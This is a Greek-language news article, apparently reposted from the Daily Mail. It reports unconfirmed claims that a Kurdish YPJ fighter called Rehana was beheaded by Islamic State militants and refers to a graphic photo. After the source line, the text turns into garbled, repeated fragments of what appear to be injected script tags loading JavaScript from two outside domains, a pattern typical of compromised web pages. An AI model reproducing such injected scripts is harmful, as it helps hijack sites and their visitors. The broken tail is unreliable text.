Αποκεφάλισαν την κούρδισσα μαχήτρια “σύμβολο της ειρήνης”; (Σκληρές εικόνες)

Image

Μια κούρδισσα μαχητρια οι οποια είχε γίνει γνωστή ως σύμβολο της αντίστασης των κούρδων και μέσω των κοινωνικών μέσων εχει κάνει τον γύρο του διαδικτύου με χιλιάδες tweets φέρεται να έχει χάσει την ζωή της στα χέρια των τζιχαντιστών του Ισλαμικού Κράτους με αποκεφαλισμό.

Η γυναίκα, που είναι γνωστή με το ψευδώνυμο Rehana (Ριάνα), έγινε σύμβολο της ελπίδας για την εμπόλεμη πόλη στα σύνορα της Συρίας, Κομπάνι, αφου ένας δημοσιογράφος τράβηξε μια φωτογραφία της ενώ έκανε το σήμα της ειρήνης, η Rehana (Ριάνα) υποστήριξε οτι ειχε σκοτώσει πάνω απο 100 τζιχαντιστές. Η φωτογραφία και το μήνυμα της ανέβηκαν στο Twitter και έγιναν retweeted (μοιράστηκαν) πάνω απο 5000 φορές.

Ωστόσο τώρα σύμφωνα με πηγές η Rehana (Ριάνα), η οποία ήταν ενταγμένη στο YPJ, την Μονάδα Άμυνας Γυναικών, μπορεί να είχε σκοτωθεί μετά απο διάφορες φωτογραφίες που άρχισαν να κυκλοφορούν στο Twitter ενός τζιχαντιστή που υποτίθεται κρατάει ψηλά το κεφάλι της.
Μάλιστα η συγκεκριμένη φωτογραφία ειχε αναρτηθεί στο διαδίκτυο απο τους τζιχαντιστές πριν μερικές βδομάδες και αναδημοσιεύτηκε απο τα ΜΜΕ τονιζοντας τους βάρβαρους τρόπους με τους οποίους χειρίζονται τον ιερό πόλεμο (τζιχάντ), αλλα και πώς οι κούρδισσες μαχήτριες αντιστέκονται. Την φωτογραφία, που φέρεται να απεικονίζει την Ριάνα μπορείτε να την δείτε παρακάτω, ΠΡΟΣΟΧΗ ειναι εξαιρετικά σκληρη.

 

 

Όπως αναφέρει η βρετανική εφημερίδα ο θάνατος της κούρδισσας μαχήτριας δεν εχει επιβεβαιωθεί ακόμη.

Πηγή – Daily Mail___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >